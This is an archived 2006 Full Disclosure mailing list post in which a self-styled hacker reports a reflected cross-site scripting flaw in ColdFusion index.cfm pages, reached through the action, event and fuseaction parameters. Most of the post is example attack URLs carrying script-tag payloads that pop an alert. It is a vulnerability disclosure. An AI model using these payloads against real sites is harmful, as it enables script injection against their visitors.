Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

New Ploblem in Index.cfm

From: saied hackeriran <saiedhackeriran () yahoo com>
Date: Wed, 19 Jul 2006 06:12:49 -0700 (PDT)
           In The Name Of God

Discoverer:SaiedHacker
Group:HackeranShiraz
Critical Level : Dangerous


This matter happens in index.cfm when
We want to run some specific Functions
Such as action,event,.... and hacker 
Can start attacks such as XSS attack by
Using simple script or HtML code.


Exploit:
Http://www.Site.com/path/index.cfm?action=<script>
Http://www.Site.com/path/index.cfm?event=<script>
Http://www.Site.com/path/index.cfm?fuseaction=<script>

Xss:
Http://www.Site.com/path/index.cfm?action=<script>alert("SaiedHacker");</script>
Http://www.Site.com/path/index.cfm?event=<script>alert("SaiedHacker");</script>
Http://www.Site.com/path/index.cfm?fuseaction=<script>alert("SaiedHacker");</script>

Have fun
SaiedHackerIran () yahoo com
www.SaiedHackerPro.PersianBlog.com



__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: